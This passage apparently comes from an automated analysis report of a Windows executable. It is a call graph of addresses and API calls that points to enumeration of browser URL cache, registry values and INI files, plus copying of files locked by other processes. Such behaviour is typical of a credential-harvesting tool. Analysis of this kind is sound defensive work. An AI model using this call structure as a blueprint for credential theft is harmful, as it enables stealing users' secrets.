wcscmp 38772->38773 38773->38771 38775 40ae18 9 API calls 38774->38775 38777 4453c4 38775->38777 38776 40ae51 9 API calls 38776->38777 38777->38776 38778 4453f3 38777->38778 38779 40add4 2 API calls 38777->38779 38782 445403 250 API calls 38777->38782 38780 40aebe FindClose 38778->38780 38779->38777 38781 4453fe 38780->38781 38781->38442 38782->38777 38784 40ae7b FindNextFileW 38783->38784 38785 40ae5c FindFirstFileW 38783->38785 38786 40ae94 38784->38786 38787 40ae8f 38784->38787 38785->38786 38789 40aeb6 38786->38789 38790 409d1f 6 API calls 38786->38790 38788 40aebe FindClose 38787->38788 38788->38786 38789->38442 38790->38789 38791->38354 38792->38334 38793->38428 38794->38411 38795->38411 38796->38443 38798 409c89 38797->38798 38798->38468 38799->38496 38801 413d39 38800->38801 38802 413d2f FreeLibrary 38800->38802 38803 40b633 free 38801->38803 38802->38801 38804 413d42 38803->38804 38805 40b633 free 38804->38805 38806 413d4a 38805->38806 38806->38324 38807->38327 38808->38371 38809->38394 38811 44db70 38810->38811 38812 40b6fc memset 38811->38812 38813 409c70 2 API calls 38812->38813 38814 40b732 wcsrchr 38813->38814 38815 40b743 38814->38815 38816 40b746 memset 38814->38816 38815->38816 38817 40b2cc 27 API calls 38816->38817 38818 40b76f 38817->38818 38819 409d1f 6 API calls 38818->38819 38820 40b783 38819->38820 39616 409b98 GetFileAttributesW 38820->39616 38822 40b792 38823 40b7c2 38822->38823 38825 409c70 2 API calls 38822->38825 39617 40bb98 38823->39617 38827 40b7a5 38825->38827 38830 40b2cc 27 API calls 38827->38830 38828 40b837 CloseHandle 38833 40b83e memset 38828->38833 38829 40b817 39651 409a45 GetTempPathW 38829->39651 38831 40b7b2 38830->38831 38834 409d1f 6 API calls 38831->38834 39650 40a6e6 WideCharToMultiByte 38833->39650 38834->38823 38835 40b827 38835->38833 38837 40b866 38838 444432 120 API calls 38837->38838 38839 40b879 38838->38839 38840 40b273 27 API calls 38839->38840 38841 40bad5 38839->38841 38842 40b89a 38840->38842 38843 40b04b ??3@YAXPAX 38841->38843 38844 438552 133 API calls 38842->38844 38845 40baf3 38843->38845 38846 40b8a4 38844->38846 38845->38405 38847 40bacd 38846->38847 38849 4251c4 136 API calls 38846->38849 38848 443d90 110 API calls 38847->38848 38848->38841 38872 40b8b8 38849->38872 38850 40bac6 39663 424f26 122 API calls 38850->39663 38851 40b8bd memset 39654 425413 17 API calls 38851->39654 38854 425413 17 API calls 38854->38872 38857 40a71b MultiByteToWideChar 38857->38872 38858 40a734 MultiByteToWideChar 38858->38872 38861 40b9b5 memcmp 38861->38872 38862 4099c6 2 API calls 38862->38872 38863 404423 37 API calls 38863->38872 38866 4251c4 136 API calls 38866->38872 38867 40bb3e memset memcpy 39664 40a734 MultiByteToWideChar 38867->39664 38869 40bb88 LocalFree 38869->38872 38872->38850 38872->38851 38872->38854 38872->38857 38872->38858 38872->38861 38872->38862 38872->38863 38872->38866 38872->38867 38873 40ba5f memcmp 38872->38873 39655 4253ef 16 API calls 38872->39655 39656 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38872->39656 39657 4253af 17 API calls 38872->39657 39658 4253cf 17 API calls 38872->39658 39659 447280 memset 38872->39659 39660 447960 memset memcpy memcpy memcpy 38872->39660 39661 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38872->39661 39662 447920 memcpy memcpy memcpy 38872->39662 38873->38872 38874->38407 38876 40aed1 38875->38876 38877 40aec7 FindClose 38875->38877 38876->38458 38877->38876 38879 4099d7 38878->38879 38880 4099da memcpy 38878->38880 38879->38880 38880->38381 38882 40b2cc 27 API calls 38881->38882 38883 44543f 38882->38883 38884 409d1f 6 API calls 38883->38884 38885 44544f 38884->38885 39753 409b98 GetFileAttributesW 38885->39753 38887 44545e 38888 445476 38887->38888 38890 40b6ef 249 API calls 38887->38890 38889 40b2cc 27 API calls 38888->38889 38891 445482 38889->38891 38890->38888 38892 409d1f 6 API calls 38891->38892 38893 445492 38892->38893 39754 409b98 GetFileAttributesW 38893->39754 38895 4454a1 38896 4454b9 38895->38896 38897 40b6ef 249 API calls 38895->38897 38896->38409 38897->38896 38898->38408 38899->38433 38900->38439 38901->38474 38902->38455 38903->38504 38904->38504 38905->38485 38906->38515 38907->38517 38908->38519 38910 414c2e 14 API calls 38909->38910 38911 40c2ae 38910->38911 38965 40c1d3 38911->38965 38916 40c3be 38933 40a8ab 38916->38933 38917 40afcf 2 API calls 38918 40c2fd FindFirstUrlCacheEntryW 38917->38918 38919 40c3b6 38918->38919 38920 40c31e wcschr 38918->38920 38921 40b04b ??3@YAXPAX 38919->38921 38922 40c331 38920->38922 38923 40c35e FindNextUrlCacheEntryW 38920->38923 38921->38916 38925 40a8ab 9 API calls 38922->38925 38923->38920 38924 40c373 GetLastError 38923->38924 38926 40c3ad FindCloseUrlCache 38924->38926 38927 40c37e 38924->38927 38928 40c33e wcschr 38925->38928 38926->38919 38929 40afcf 2 API calls 38927->38929 38928->38923 38930 40c34f 38928->38930 38931 40c391 FindNextUrlCacheEntryW 38929->38931 38932 40a8ab 9 API calls 38930->38932 38931->38920 38931->38926 38932->38923 39081 40a97a 38933->39081 38936 40a8cc 38936->38526 39087 40b1ab free free 38938->39087 38940 40c3dd 38941 40b2cc 27 API calls 38940->38941 38942 40c3e7 38941->38942 38943 40c50e 38942->38943 38944 40c3ff 38942->38944 38958 405337 38943->38958 38945 40a9ce 4 API calls 38944->38945 38946 40c418 memset 38945->38946 39088 40aa1d 38946->39088 38949 40c471 38951 40c47a _wcsupr 38949->38951 38950 40c505 38950->38943 39090 40a8d0 7 API calls 38951->39090 38953 40c498 39091 40a8d0 7 API calls 38953->39091 38955 40c4ac memset 38956 40aa1d 38955->38956 38957 40c4e4 RegEnumValueW 38956->38957 38957->38950 38957->38951 39092 405220 38958->39092 38961->38538 38962->38540 38963->38533 38964->38534 38966 40ae18 9 API calls 38965->38966 38972 40c210 38966->38972 38967 40ae51 9 API calls 38967->38972 38968 40c264 38969 40aebe FindClose 38968->38969 38971 40c26f 38969->38971 38970 40add4 2 API calls 38970->38972 38977 40e5ed memset memset 38971->38977 38972->38967 38972->38968 38972->38970 38973 40c231 _wcsicmp 38972->38973 38974 40c1d3 34 API calls 38972->38974 38973->38972 38975 40c248 38973->38975 38974->38972 38990 40c084 21 API calls 38975->38990 38978 414c2e 14 API calls 38977->38978 38979 40e63f 38978->38979 38980 409d1f 6 API calls 38979->38980 38981 40e658 38980->38981 38991 409b98 GetFileAttributesW 38981->38991 38983 40e667 38984 409d1f 6 API calls 38983->38984 38986 40e680 38983->38986 38984->38986 38992 409b98 GetFileAttributesW 38986->38992 38987 40e68f 38988 40c2d8 38987->38988 38993 40e4b2 38987->38993 38988->38916 38988->38917 38990->38972 38991->38983 38992->38987 39014 40e01e 38993->39014 38995 40e593 38996 40e5b0 38995->38996 38997 40e59c DeleteFileW 38995->38997 38998 40b04b ??3@YAXPAX 38996->38998 38997->38996 39000 40e5bb 38998->39000 38999 40e521 38999->38995 39037 40e175 38999->39037 39002 40e5c4 CloseHandle 39000->39002 39003 40e5cc 39000->39003 39002->39003 39005 40b633 free 39003->39005 39004 40e573 39007 40e584 39004->39007 39008 40e57c CloseHandle 39004->39008 39006 40e5db 39005->39006 39010 40b633 free 39006->39010 39080 40b1ab free free 39007->39080 39008->39007 39009 40e540 39009->39004 39057 40e2ab 39009->39057 39012 40e5e3 39010->39012 39012->38988 39015 406214 22 API calls 39014->39015 39016 40e03c 39015->39016 39017 40e16b 39016->39017 39018 40dd85 74 API calls 39016->39018 39017->38999 39019 40e06b 39018->39019 39019->39017 39020 40afcf ??2@YAPAXI ??3@YAXPAX 39019->39020 39021 40e08d OpenProcess 39020->39021 39022 40e0a4 GetCurrentProcess DuplicateHandle 39021->39022 39026 40e152 39021->39026 39023 40e0d0 GetFileSize 39022->39023 39024 40e14a CloseHandle 39022->39024 39027 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39023->39027 39024->39026 39025 40e160 39029 40b04b ??3@YAXPAX 39025->39029 39026->39025 39028 406214 22 API calls 39026->39028 39030 40e0ea 39027->39030 39028->39025 39029->39017 39031 4096dc CreateFileW 39030->39031 39032 40e0f1 CreateFileMappingW 39031->39032 39033 40e140 CloseHandle CloseHandle 39032->39033 39034 40e10b MapViewOfFile 39032->39034 39033->39024 39035 40e13b CloseHandle 39034->39035 39036 40e11f WriteFile UnmapViewOfFile 39034->39036 39035->39033 39036->39035 39038 40e18c 39037->39038 39039 406b90 11 API calls 39038->39039 39040 40e19f 39039->39040 39041 40e1a7 memset 39040->39041 39042 40e299 39040->39042 39047 40e1e8 39041->39047 39043 4069a3 ??3@YAXPAX free 39042->39043 39044 40e2a4 39043->39044 39044->39009 39045 406e8f 13 API calls 39045->39047 39046 406b53 SetFilePointerEx ReadFile 39046->39047 39047->39045 39047->39046 39048 40dd50 _wcsicmp 39047->39048 39049 40e283 39047->39049 39053 40742e 8 API calls 39047->39053 39054 40aae3 wcslen wcslen _memicmp 39047->39054 39055 40e244 _snwprintf 39047->39055 39048->39047 39050 40e291 39049->39050 39051 40e288 free 39049->39051 39052 40aa04 free 39050->39052 39051->39050 39052->39042 39053->39047 39054->39047 39056 40a8d0 7 API calls 39055->39056 39056->39047 39058 40e2c2 39057->39058 39059 406b90 11 API calls 39058->39059 39070 40e2d3 39059->39070 39060 40e4a0 39061 4069a3 ??3@YAXPAX free 39060->39061 39063 40e4ab 39061->39063 39062 406e8f 13 API calls 39062->39070 39063->39009 39064 406b53 SetFilePointerEx ReadFile 39064->39070 39065 40e489 39066 40aa04 free 39065->39066 39067 40e491 39066->39067 39067->39060 39069 40e497 free 39067->39069 39068 40dd50 _wcsicmp 39068->39070 39069->39060 39070->39060 39070->39062 39070->39064 39070->39065 39070->39068 39071 40dd50 _wcsicmp 39070->39071 39074 40742e 8 API calls 39070->39074 39075 40e3e0 memcpy 39070->39075 39076 40e3fb memcpy 39070->39076 39077 40e3b3 wcschr 39070->39077 39078 40e416 memcpy 39070->39078 39079 40e431 memcpy 39070->39079 39072 40e376 memset 39071->39072 39073 40aa29 6 API calls 39072->39073 39073->39070 39074->39070 39075->39070 39076->39070 39077->39070 39078->39070 39079->39070 39080->38995 39082 40a980 39081->39082 39083 40a995 _wcsicmp 39082->39083 39084 40a99c wcscmp 39082->39084 39085 40a8bb 39082->39085 39083->39082 39084->39082 39085->38936 39086 40a8d0 7 API calls 39085->39086 39086->38936 39087->38940 39089 40aa23 RegEnumValueW 39088->39089 39089->38949 39089->38950 39090->38953 39091->38955 39093 405335 39092->39093 39094 40522a 39092->39094 39093->38533 39095 40b2cc 27 API calls 39094->39095 39096 405234 39095->39096 39097 40a804 8 API calls 39096->39097 39098 40523a 39097->39098 39137 40b273 39098->39137 39100 405248 _mbscpy _mbscat GetProcAddress 39101 40b273 27 API calls 39100->39101 39102 405279 39101->39102 39140 405211 GetProcAddress 39102->39140 39104 405282 39105 40b273 27 API calls 39104->39105 39106 40528f 39105->39106 39141 405211 GetProcAddress 39106->39141 39108 405298 39109 40b273 27 API calls 39108->39109 39110 4052a5 39109->39110 39142 405211 GetProcAddress 39110->39142 39112 4052ae 39113 40b273 27 API calls 39112->39113 39114 4052bb 39113->39114 39143 405211 GetProcAddress 39114->39143 39116 4052c4 39117 40b273 27 API calls 39116->39117 39118 4052d1 39117->39118 39144 405211 GetProcAddress 39118->39144 39120 4052da 39121 40b273 27 API calls 39120->39121 39122 4052e7 39121->39122 39145 405211 GetProcAddress 39122->39145 39124 4052f0 39125 40b273 27 API calls 39124->39125 39126 4052fd 39125->39126 39146 405211 GetProcAddress 39126->39146 39128 405306 39129 40b273 27 API calls 39128->39129 39130 405313 39129->39130 39147 405211 GetProcAddress 39130->39147 39132 40531c 39133 40b273 27 API calls 39132->39133 39134 405329 39133->39134 39148 405211 GetProcAddress 39134->39148 39136 405332 39136->39093 39138 40b58d 27 API calls 39137->39138 39139 40b18c 39138->39139 39139->39100 39140->39104 39141->39108 39142->39112 39143->39116 39144->39120 39145->39124 39146->39128 39147->39132 39148->39136 39150 40440c FreeLibrary 39149->39150 39151 40436d 39150->39151 39152 40a804 8 API calls 39151->39152 39153 404377 39152->39153 39154 404383 39153->39154 39155 404405 39153->39155 39156 40b273 27 API calls 39154->39156 39155->38545 39155->38547 39155->38548 39157 40438d GetProcAddress 39156->39157 39158 40b273 27 API calls 39157->39158 39159 4043a7 GetProcAddress 39158->39159 39160 40b273 27 API calls 39159->39160 39161 4043ba GetProcAddress 39160->39161 39162 40b273 27 API calls 39161->39162 39163 4043ce GetProcAddress 39162->39163 39164 40b273 27 API calls 39163->39164 39165 4043e2 GetProcAddress 39164->39165 39166 4043f1 39165->39166 39167 4043f7 39166->39167 39168 40440c FreeLibrary 39166->39168 39167->39155 39168->39155 39170 404413 FreeLibrary 39169->39170 39171 40441e 39169->39171 39170->39171 39171->38562 39172->38558 39174 40447e 39173->39174 39175 40442e 39173->39175 39174->38558 39176 40b2cc 27 API calls 39175->39176 39177 404438 39176->39177 39178 40a804 8 API calls 39177->39178 39179 40443e 39178->39179 39180 404445 39179->39180 39181 404467 39179->39181 39182 40b273 27 API calls 39180->39182 39181->39174 39184 404475 FreeLibrary 39181->39184 39183 40444f GetProcAddress 39182->39183 39183->39181 39185 404460 39183->39185 39184->39174 39185->39181 39187 4135f6 39186->39187 39188 4135eb FreeLibrary 39186->39188 39187->38565 39188->39187 39190 4449c4 39189->39190 39191 444a52 39189->39191 39192 40b2cc 27 API calls 39190->39192 39191->38582 39191->38583 39193 4449cb 39192->39193 39194 40a804 8 API calls 39193->39194 39195 4449d1 39194->39195 39196 40b273 27 API calls 39195->39196 39197 4449dc GetProcAddress 39196->39197 39198 40b273 27 API calls 39197->39198 39199 4449f3 GetProcAddress 39198->39199 39200 40b273 27 API calls 39199->39200 39201 444a04 GetProcAddress 39200->39201 39202 40b273 27 API calls 39201->39202 39203 444a15 GetProcAddress 39202->39203 39204 40b273 27 API calls 39203->39204 39205 444a26 GetProcAddress 39204->39205 39206 40b273 27 API calls 39205->39206 39207 444a37 GetProcAddress 39206->39207 39208 40b273 27 API calls 39207->39208 39209 444a48 GetProcAddress 39208->39209 39209->39191 39210->38593 39211->38593 39212->38593 39213->38593 39214->38584 39216 403a29 39215->39216 39230 403bed memset memset 39216->39230 39218 403ae7 39243 40b1ab free free 39218->39243 39219 403a3f memset 39223 403a2f 39219->39223 39221 403aef 39221->38600 39222 409d1f 6 API calls 39222->39223 39223->39218 39223->39219 39223->39222 39224 409b98 GetFileAttributesW 39223->39224 39225 40a8d0 7 API calls 39223->39225 39224->39223 39225->39223 39227 40a051 GetFileTime CloseHandle 39226->39227 39228 4039ca CompareFileTime 39226->39228 39227->39228 39228->38600 39229->38601 39231 414c2e 14 API calls 39230->39231 39232 403c38 39231->39232 39233 409719 2 API calls 39232->39233 39234 403c3f wcscat 39233->39234 39235 414c2e 14 API calls 39234->39235 39236 403c61 39235->39236 39237 409719 2 API calls 39236->39237 39238 403c68 wcscat 39237->39238 39244 403af5 39238->39244 39241 403af5 20 API calls 39242 403c95 39241->39242 39242->39223 39243->39221 39245 403b02 39244->39245 39246 40ae18 9 API calls 39245->39246 39255 403b37 39246->39255 39247 403bdb 39249 40aebe FindClose 39247->39249 39248 40add4 wcscmp wcscmp 39248->39255 39250 403be6 39249->39250 39250->39241 39251 40a8d0 7 API calls 39251->39255 39252 40ae18 9 API calls 39252->39255 39253 40ae51 9 API calls 39253->39255 39254 40aebe FindClose 39254->39255 39255->39247 39255->39248 39255->39251 39255->39252 39255->39253 39255->39254 39257 409d1f 6 API calls 39256->39257 39258 404190 39257->39258 39271 409b98 GetFileAttributesW 39258->39271 39260 40419c 39261 4041a7 6 API calls 39260->39261 39262 40435c 39260->39262 39263 40424f 39261->39263 39262->38622 39263->39262 39265 40425e memset 39263->39265 39267 409d1f 6 API calls 39263->39267 39268 40a8ab 9 API calls 39263->39268 39272 414842 39263->39272 39265->39263 39266 404296 wcscpy 39265->39266 39266->39263 39267->39263 39269 4042b6 memset memset _snwprintf wcscpy 39268->39269 39269->39263 39270->38626 39271->39260 39275 41443e 39272->39275 39274 414866 39274->39263 39276 41444b 39275->39276 39277 414451 39276->39277 39278 4144a3 GetPrivateProfileStringW 39276->39278 39279 414491 39277->39279 39280 414455 wcschr 39277->39280 39278->39274 39282 414495 WritePrivateProfileStringW 39279->39282 39280->39279 39281 414463 _snwprintf 39280->39281 39281->39282 39282->39274 39283->38631 39285 40b2cc 27 API calls 39284->39285 39286 409615 39285->39286 39287 409d1f 6 API calls 39286->39287 39288 409625 39287->39288 39313 409b98 GetFileAttributesW 39288->39313 39290 409634 39291 409648 39290->39291 39314 4091b8 memset 39290->39314 39293 40b2cc 27 API calls 39291->39293 39295 408801 39291->39295 39294 40965d 39293->39294 39296 409d1f 6 API calls 39294->39296 39295->38634 39295->38678 39297 40966d 39296->39297 39366 409b98 GetFileAttributesW 39297->39366 39299 40967c 39299->39295 39300 409681 39299->39300 39367 409529 72 API calls 39300->39367 39302 409690 39302->39295 39303->38656 39304->38678 39305->38661 39306->38678 39307->38666 39308->38667 39313->39290 39368 40a6e6 WideCharToMultiByte 39314->39368 39316 409202 39369 444432 39316->39369 39319 40b273 27 API calls 39320 409236 39319->39320 39415 438552 39320->39415 39323 409383 39325 40b273 27 API calls 39323->39325 39327 409399 39325->39327 39326 409254 39328 40937b 39326->39328 39436 4253cf 17 API calls 39326->39436 39329 438552 133 API calls 39327->39329 39440 424f26 122 API calls 39328->39440 39348 4093a3 39329->39348 39332 409267 39437 4253cf 17 API calls 39332->39437 39333 4094ff 39444 443d90 39333->39444 39336 4251c4 136 API calls 39336->39348 39337 409273 39438 4253af 17 API calls 39337->39438 39338 409507 39346 40951d 39338->39346 39464 408f2f 77 API calls 39338->39464 39340 4093df 39443 424f26 122 API calls 39340->39443 39342 4253cf 17 API calls 39342->39348 39346->39291 39348->39333 39348->39336 39348->39340 39348->39342 39350 4093e4 39348->39350 39441 4253af 17 API calls 39350->39441 39356 4093ed 39442 4253af 17 API calls 39356->39442 39359 4093f9 39359->39340 39360 409409 memcmp 39359->39360 39360->39340 39361 409421 memcmp 39360->39361 39362 4094a4 memcmp 39361->39362 39363 409435 39361->39363 39362->39340 39365 4094b8 memcpy memcpy 39362->39365 39363->39340 39364 409442 memcpy memcpy memcpy 39363->39364 39364->39340 39365->39340 39366->39299 39367->39302 39368->39316 39465 4438b5 39369->39465 39371 44444c 39377 409215 39371->39377 39479 415a6d 39371->39479 39374 444486 39376 4444b9 memcpy 39374->39376 39414 4444a4 39374->39414 39375 44469e 39375->39377 39379 443d90 110 API calls 39375->39379 39483 415258 39376->39483 39377->39319 39377->39346 39379->39377 39380 444524 39381 444541 39380->39381 39382 44452a 39380->39382 39486 444316 39381->39486 39520 416935 39382->39520 39386 444316 18 API calls 39387 444563 39386->39387 39388 444316 18 API calls 39387->39388 39389 44456f 39388->39389 39390 444316 18 API calls 39389->39390 39391 44457f 39390->39391 39391->39414 39500 432d4e 39391->39500 39394 444316 18 API calls 39395 4445b0 39394->39395 39504 41eed2 39395->39504 39533 4442e6 11 API calls 39414->39533 39534 438460 39415->39534 39417 409240 39417->39323 39418 4251c4 39417->39418 39546 424f07 39418->39546 39420 4251e4 39421 4251f7 39420->39421 39422 4251e8 39420->39422 39554 4250f8 39421->39554 39553 4446ea 11 API calls 39422->39553 39424 4251f2 39424->39326 39426 425209 39429 425249 39426->39429 39432 4250f8 126 API calls 39426->39432 39433 425287 39426->39433 39562 4384e9 134 API calls 39426->39562 39563 424f74 123 API calls 39426->39563 39429->39433 39564 424ff0 13 API calls 39429->39564 39432->39426 39566 415c7d 16 API calls 39433->39566 39434 425266 39434->39433 39565 415be9 memcpy 39434->39565 39436->39332 39437->39337 39440->39323 39441->39356 39442->39359 39443->39333 39445 443da3 39444->39445 39463 443db6 39444->39463 39567 41707a 11 API calls 39445->39567 39447 443da8 39448 443dac 39447->39448 39450 443dbc 39447->39450 39568 4446ea 11 API calls 39448->39568 39569 4300e8 memset memset memcpy 39450->39569 39452 443de0 39453 416935 16 API calls 39452->39453 39453->39463 39454 443dce 39454->39452 39458 443e22 39454->39458 39455 443e5a 39458->39455 39570 41f0ac 102 API calls 39458->39570 39463->39338 39464->39346 39466 4438d0 39465->39466 39472 4438c9 39465->39472 39467 415378 memcpy memcpy 39466->39467 39468 4438d5 39467->39468 39469 4154e2 10 API calls 39468->39469 39470 443906 39468->39470 39468->39472 39469->39470 39471 443970 memset 39470->39471 39470->39472 39474 44398b 39471->39474 39472->39371 39473 415700 10 API calls 39476 4439c0 39473->39476 39475 41975c 10 API calls 39474->39475 39477 4439a0 39474->39477 39475->39477 39476->39472 39478 418981 10 API calls 39476->39478 39477->39472 39477->39473 39478->39472 39480 415a77 39479->39480 39481 415a8d 39480->39481 39482 415a7e memset 39480->39482 39481->39374 39482->39481 39484 4438b5 11 API calls 39483->39484 39485 41525d 39484->39485 39485->39380 39487 444328 39486->39487 39488 444423 39487->39488 39489 44434e 39487->39489 39490 4446ea 11 API calls 39488->39490 39491 432d4e memset memset memcpy 39489->39491 39497 444381 39490->39497 39492 44435a 39491->39492 39494 444375 39492->39494 39499 44438b 39492->39499 39493 432d4e memset memset memcpy 39495 4443ec 39493->39495 39496 416935 16 API calls 39494->39496 39495->39497 39498 416935 16 API calls 39495->39498 39496->39497 39497->39386 39498->39497 39499->39493 39501 432d58 39500->39501 39503 432d65 39500->39503 39502 432cc4 memset memset memcpy 39501->39502 39502->39503 39503->39394 39505 41eee2 39504->39505 39521 41693e 39520->39521 39524 41698e 39520->39524 39522 41694c 39521->39522 39523 422fd1 memset 39521->39523 39522->39524 39525 4165a0 11 API calls 39522->39525 39523->39522 39524->39414 39526 416972 39525->39526 39526->39524 39527 422b84 15 API calls 39526->39527 39527->39524 39533->39375 39535 41703f 11 API calls 39534->39535 39536 43847a 39535->39536 39537 43848a 39536->39537 39538 43847e 39536->39538 39540 438270 133 API calls 39537->39540 39539 4446ea 11 API calls 39538->39539 39542 438488 39539->39542 39541 4384aa 39540->39541 39541->39542 39543 424f26 122 API calls 39541->39543 39542->39417 39544 4384bb 39543->39544 39545 438270 133 API calls 39544->39545 39545->39542 39547 424f1f 39546->39547 39548 424f0c 39546->39548 39550 424eea 11 API calls 39547->39550 39549 416760 11 API calls 39548->39549 39551 424f18 39549->39551 39552 424f24 39550->39552 39551->39420 39552->39420 39553->39424 39555 425108 39554->39555 39561 42510d 39554->39561 39556 424f74 123 API calls 39555->39556 39556->39561 39557 42569b 124 API calls 39558 42516e 39557->39558 39560 415c7d 16 API calls 39558->39560 39559 425115 39559->39426 39560->39559 39561->39557 39561->39559 39562->39426 39563->39426 39564->39434 39565->39433 39566->39424 39567->39447 39568->39463 39569->39454 39570->39458 39601 413f4f 39573->39601 39576 413f37 K32GetModuleFileNameExW 39577 413f4a 39576->39577 39577->38695 39579 41396c wcschr 39578->39579 39581 413969 wcscpy 39578->39581 39579->39581 39582 41398e 39579->39582 39583 413a3a 39581->39583 39606 4097f7 wcslen wcslen _memicmp 39582->39606 39583->38695 39585 41399a 39586 4139a4 memset 39585->39586 39587 4139e6 39585->39587 39607 409dd5 GetWindowsDirectoryW wcscpy 39586->39607 39589 413a31 wcscpy 39587->39589 39590 4139ec memset 39587->39590 39589->39583 39608 409dd5 GetWindowsDirectoryW wcscpy 39590->39608 39591 4139c9 wcscpy wcscat 39591->39583 39593 413a11 memcpy wcscat 39593->39583 39595 413cb0 GetModuleHandleW 39594->39595 39596 413cda 39594->39596 39595->39596 39597 413cbf GetProcAddress 39595->39597 39598 413ce3 GetProcessTimes 39596->39598 39599 413cf6 39596->39599 39597->39596 39598->38697 39599->38697 39600->38688 39602 413f2f 39601->39602 39603 413f54 39601->39603 39602->39576 39602->39577 39604 40a804 8 API calls 39603->39604 39605 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39604->39605 39605->39602 39606->39585 39607->39591 39608->39593 39609->38718 39610->38740 39612 409cf9 GetVersionExW 39611->39612 39613 409d0a 39611->39613 39612->39613 39613->38747 39613->38750 39614->38754 39615->38756 39616->38822 39618 40bba5 39617->39618 39665 40cc26 39618->39665 39621 40bd4b 39686 40cc0c 39621->39686 39626 40b2cc 27 API calls 39627 40bbef 39626->39627 39693 40ccf0 _wcsicmp 39627->39693 39629 40bbf5 39629->39621 39694 40ccb4 6 API calls 39629->39694 39631 40bc26 39632 40cf04 17 API calls 39631->39632 39633 40bc2e 39632->39633 39634 40bd43 39633->39634 39635 40b2cc 27 API calls 39633->39635 39636 40cc0c 4 API calls 39634->39636 39637 40bc40 39635->39637 39636->39621 39695 40ccf0 _wcsicmp 39637->39695 39639 40bc46 39639->39634 39640 40bc61 memset memset WideCharToMultiByte 39639->39640 39696 40103c strlen 39640->39696 39642 40bcc0 39643 40b273 27 API calls 39642->39643 39644 40bcd0 memcmp 39643->39644 39644->39634 39645 40bce2 39644->39645 39646 404423 37 API calls 39645->39646 39647 40bd10 39646->39647 39647->39634 39648 40bd3a LocalFree 39647->39648 39649 40bd1f memcpy 39647->39649 39648->39634 39649->39648 39650->38837 39652 409a74 GetTempFileNameW 39651->39652 39653 409a66 GetWindowsDirectoryW 39651->39653 39652->38835 39653->39652 39654->38872 39655->38872 39656->38872 39657->38872 39658->38872 39659->38872 39660->38872 39661->38872 39662->38872 39663->38847 39664->38869 39697 4096c3 CreateFileW 39665->39697 39667 40cc34 39668 40cc3d GetFileSize 39667->39668 39669 40bbca 39667->39669 39670 40afcf 2 API calls 39668->39670 39669->39621 39677 40cf04 39669->39677 39671 40cc64 39670->39671 39698 40a2ef ReadFile 39671->39698 39673 40cc71 39699 40ab4a MultiByteToWideChar 39673->39699 39675 40cc95 CloseHandle 39676 40b04b ??3@YAXPAX 39675->39676 39676->39669 39678 40b633 free 39677->39678 39679 40cf14 39678->39679 39705 40b1ab free free 39679->39705 39681 40bbdd 39681->39621 39681->39626 39682 40cf1b 39682->39681 39684 40cfef 39682->39684 39706 40cd4b 39682->39706 39685 40cd4b 14 API calls 39684->39685 39685->39681 39687 40b633 free 39686->39687 39688 40cc15 39687->39688 39689 40aa04 free 39688->39689 39690 40cc1d 39689->39690 39752 40b1ab free free 39690->39752 39692 40b7d4 memset CreateFileW 39692->38828 39692->38829 39693->39629 39694->39631 39695->39639 39696->39642 39697->39667 39698->39673 39700 40ab6b 39699->39700 39704 40ab93 39699->39704 39701 40a9ce 4 API calls 39700->39701 39702 40ab74 39701->39702 39703 40ab7c MultiByteToWideChar 39702->39703 39703->39704 39704->39675 39705->39682 39707 40cd7b 39706->39707 39740 40aa29 6 API calls 39707->39740 39709 40cef5 39710 40aa04 free 39709->39710 39711 40cefd 39710->39711 39711->39682 39712 40cd89 39712->39709 39741 40aa29 6 API calls 39712->39741 39714 40ce1d 39742 40aa29 6 API calls 39714->39742 39716 40ce3e 39717 40ce6a 39716->39717 39743 40abb7 wcslen memmove 39716->39743 39718 40ce9f 39717->39718 39746 40abb7 wcslen memmove 39717->39746 39749 40a8d0 7 API calls 39718->39749 39722 40ce56 39744 40aa71 wcslen 39722->39744 39723 40ce8b 39747 40aa71 wcslen 39723->39747 39724 40ceb5 39750 40a8d0 7 API calls 39724->39750 39727 40ce5e 39745 40abb7 wcslen memmove 39727->39745 39728 40ce93 39748 40abb7 wcslen memmove 39728->39748 39732 40cecb 39751 40d00b malloc memcpy free free 39732->39751 39734 40cedd 39735 40aa04 free 39734->39735 39736 40cee5 39735->39736 39737 40aa04 free 39736->39737 39738 40ceed 39737->39738 39739 40aa04 free 39738->39739 39739->39709 39740->39712 39741->39714 39742->39716 39743->39722 39744->39727 39745->39717 39746->39723 39747->39728 39748->39718 39749->39724 39750->39732 39751->39734 39752->39692 39753->38887 39754->38895 37675 44dea5 37676 44deb5 FreeLibrary 37675->37676 37677 44dec3 37675->37677 37676->37677 39764 4148b6 FindResourceW 39765 4148cf SizeofResource 39764->39765 39768 4148f9 39764->39768 39766 4148e0 LoadResource 39765->39766 39765->39768 39767 4148ee LockResource 39766->39767 39766->39768 39767->39768 37851 415304 free 39769 441b3f 39779 43a9f6 39769->39779 39771 441b61 39952 4386af memset 39771->39952 39773 44189a 39774 4418e2 39773->39774 39776 442bd4 39773->39776 39775 4418ea 39774->39775 39953 4414a9 12 API calls 39774->39953 39776->39775 39954 441409 memset 39776->39954 39780 43aa20 39779->39780 39781 43aadf 39779->39781 39780->39781 39782 43aa34 memset 39780->39782 39781->39771 39783 43aa56 39782->39783 39784 43aa4d 39782->39784 39955 43a6e7 39783->39955 39963 42c02e memset 39784->39963 39789 43aad3 39965 4169a7 11 API calls 39789->39965 39790 43aaae 39790->39781 39790->39789 39805 43aae5 39790->39805 39791 43ac18 39794 43ac47 39791->39794 39967 42bbd5 memcpy memcpy memcpy memset memcpy 39791->39967 39795 43aca8 39794->39795 39968 438eed 16 API calls 39794->39968 39798 43acd5 39795->39798 39970 4233ae 11 API calls 39795->39970 39971 423426 11 API calls 39798->39971 39799 43ac87 39969 4233c5 16 API calls 39799->39969 39803 43ace1 39972 439811 162 API calls 39803->39972 39804 43a9f6 160 API calls 39804->39805 39805->39781 39805->39791 39805->39804 39966 439bbb 22 API calls 39805->39966 39807 43acfd 39812 43ad2c 39807->39812 39973 438eed 16 API calls 39807->39973 39809 43ad19 39974 4233c5 16 API calls 39809->39974 39810 43ad58 39975 44081d 162 API calls 39810->39975 39812->39810 39816 43add9 39812->39816 39815 43ae3a memset 39817 43ae73 39815->39817 39816->39816 39979 423426 11 API calls 39816->39979 39980 42e1c0 146 API calls 39817->39980 39818 43adab 39977 438c4e 162 API calls 39818->39977 39821 43ad6c 